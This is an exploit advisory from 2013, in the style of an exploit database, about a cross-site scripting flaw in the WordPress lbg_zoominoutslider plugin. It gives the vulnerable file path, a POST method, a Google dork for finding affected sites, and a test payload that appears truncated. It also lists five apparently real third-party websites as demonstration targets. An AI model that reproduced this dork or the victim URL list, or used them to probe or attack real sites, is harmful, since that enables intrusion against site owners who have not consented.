####################################################################### # Exploit Title : Wordpress lbg zoominoutslider Plugin Cross site scripting Vulnerability # # Exploit Author : Ashiyane Digital Security Team # # Google Dork: : inurl:/wp-content/plugins/lbg_zoominoutslider # # Date: 2013/09/24 # # Vendor Homepage : http://wordpress.org # # Tested on: Windows # ############## # # Location: /wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php # # metod : Post # # Script for Test : "/> # ############## ############## # Demo: # # http://www.alpinewellness.com/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php # # http://www.cristalproducts.com/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php # # http://www.fullsunpv.com/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php # # http://www.gibneydance.org/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php # # http://wgeorge.com/cms/wp-content/plugins/lbg_zoominoutslider/tpl/add_banner.php # ############## # # Discovered By : ACC3SS # ##############